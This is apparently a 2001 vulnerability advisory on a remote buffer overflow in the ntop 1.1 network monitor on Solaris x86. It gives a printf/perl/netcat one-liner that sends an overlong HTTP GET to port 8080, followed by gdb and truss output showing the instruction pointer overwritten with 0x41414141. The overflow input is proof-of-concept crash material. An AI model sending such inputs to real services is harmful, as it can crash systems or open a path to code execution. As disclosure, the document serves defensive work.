====================================================================== Remote Buffer Overflow Under Solaris_x86 NTOP - NEtwork Monitor vulnerable to compromise the system Author: alt3kx! Alternative: Date: 2001-05-23 Site: www.raza-mexicana.org Greet to: _0x90_, Dex, PaTa , Rebel and S0r from AR & Spain Teams: Raregazz - X-ploit and S0d in special to White-B ====================================================================== ------------------------=[Brief Description]=------------------------- Exist the buffer overflow around 300 characteres, when u sending to port running the daemon, in this caseis port 8080 the users can execute code malicious to obtain high privilegies. --------------------------=[Plataforms]=-------------------------- Sun Solaris 7.0_x86 Sun Solaris 2.6_x86 ---------------------------=[Summary]=---------------------------- Proof of concept : # ls -la /opt/ntop/bin/ntop -rwsr-xr-x 1 bin bin 249680 May 3 1999 /opt/ntop/bin/ntop # One step Run ntop as root the daemon # /opt/ntop/bin/ntop -w 8080 ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0. Copyright 1998-99 by Luca Deri Warning: unable to read file '.ntop'. No security will be used! Waiting for HTTP connections on port 8080... [66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00 [66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00 [66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00 [66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00 [66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00 [66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00 . . . . . Two step: Run the next script as user normal: [local]:alt3kx# printf "GET /`perl -e 'print "A"x245'`\r\n\r\n" |nc localhost 8080 HTTP/1.0 200 OK Server: ntop/1.1 (i386-pc-solaris2.7) Content-type: text/html

Unable to find information related to hostAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> FRESH CONTENT=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Generated by ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0
© 1998-99 by L. Deri
[local]:alt3kx# SUCKS!!! NOT FUNCTIONALitY, AGAIN with more A´s :-) [local]:alt3kx# printf "GET /`perl -e 'print "A"x246'`\r\n\r\n" |nc localhost 8080 [local]:alt3kx# Another shell u can see this # /opt/ntop/bin/ntop -w 8080 ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0. Copyright 1998-99 by Luca Deri Warning: unable to read file '.ntop'. No security will be used! Waiting for HTTP connections on port 8080... [66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00 [66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00 [66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00 [66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00 [66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00 [66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00 Segmentation Fault(coredump) # [local]:alt3kx# gdb ntop --core=core GNU gdb 4.17 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-pc-solaris2.7"... Core was generated by `ntop'. Program terminated with signal 11, Segmentation Fault. Reading symbols from /lib/libsocket.so.1...done. Reading symbols from /lib/libnsl.so.1...done. Reading symbols from /lib/libgen.so.1...done. Reading symbols from /lib/libc.so.1...done. Reading symbols from /lib/libdl.so.1...done. Reading symbols from /lib/libmp.so.2...done. #0 0x41414141 in ?? () (gdb) info all-registers eax 0x1 1 ecx 0xdffe19c8 -536995384 edx 0x20a 522 ebx 0x80cef44 135065412 esp 0x8046f14 0x8046f14 ebp 0x41414141 0x41414141 esi 0xc8 200 edi 0x80980f5 134840565 eip 0x41414141 0x41414141 eflags 0x10206 66054 cs 0x17 23 ss 0x1f 31 ds 0x1f 31 es 0x1f 31 fs 0x0 0 gs 0x0 0 (gdb) [local]:alt3kx# truss /opt/ntop/bin/ntop open("/dev/zero", O_RDONLY) = 3 mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xDFFE1000 sysconfig(_CONFIG_PAGESIZE) = 4096 open("./libsocket.so.1", O_RDONLY) Err#2 ENOENT open("/lib/libsocket.so.1", O_RDONLY) = 4 fxstat(2, 4, 0x08047138) = 0 mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFDF000 mmap(0x00000000, 40960, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFD4000 mmap(0xDFFDC000, 5712, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 28672) = 0xDFFDC000 close(4) = 0 open("./libnsl.so.1", O_RDONLY) Err#2 ENOENT open("/lib/libnsl.so.1", O_RDONLY) = 4 fxstat(2, 4, 0x08047138) = 0 mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) = 0xDFFDF000 mmap(0x00000000, 503808, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFF58000 mmap(0xDFFC5000, 23248, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 442368) = 0xDFFC5000 mmap(0xDFFCB000, 29472, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFFCB000 close(4) = 0 open("./libgen.so.1", O_RDONLY) Err#2 ENOENT open("/lib/libgen.so.1", O_RDONLY) = 4 fxstat(2, 4, 0x08047138) = 0 mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) = 0xDFFDF000 mmap(0x00000000, 32768, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFF4F000 mmap(0xDFF55000, 4184, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 20480) = 0xDFF55000 close(4) = 0 open("./libc.so.1", O_RDONLY) Err#2 ENOENT open("/lib/libc.so.1", O_RDONLY) = 4 fxstat(2, 4, 0x08047138) = 0 mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) = 0xDFFDF000 mmap(0x00000000, 593920, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEBD000 mmap(0xDFF46000, 25448, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 557056) = 0xDFF46000 mmap(0xDFF4D000, 3316, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFF4D000 close(4) = 0 open("./libdl.so.1", O_RDONLY) Err#2 ENOENT open("/lib/libdl.so.1", O_RDONLY) = 4 fxstat(2, 4, 0x08047138) = 0 mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) = 0xDFFDF000 close(4) = 0 open("./libmp.so.2", O_RDONLY) Err#2 ENOENT open("/lib/libmp.so.2", O_RDONLY) = 4 fxstat(2, 4, 0x08047138) = 0 mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEBB000 mmap(0x00000000, 16384, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEB6000 mmap(0xDFEB9000, 2524, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 8192) = 0xDFEB9000 mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xDFEB4000 close(4) = 0 close(3) = 0 [...............] door_info(3, 0x08044528) = 0 door_call(3, 0x08044510) = 0 door_info(3, 0x080465E0) = 0 door_call(3, 0x080465C8) = 0 door_info(3, 0x080465E0) = 0 door_call(3, 0x080465C8) = 0 door_info(3, 0x080465E0) = 0 door_call(3, 0x080465C8) = 0 Incurred fault #6, FLTBOUNDS %pc = 0x41414141 siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141 Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141 *** process killed *** bug discovered by alt3kx! & Possible C0de cooming soon .... je :-) ---------------------------=[PATCH]=----------------------------- Download the last packages from Sun Microsystems -------------------------=[Company Compromise]=------------------- http://www.sun.com http://www.ntop.org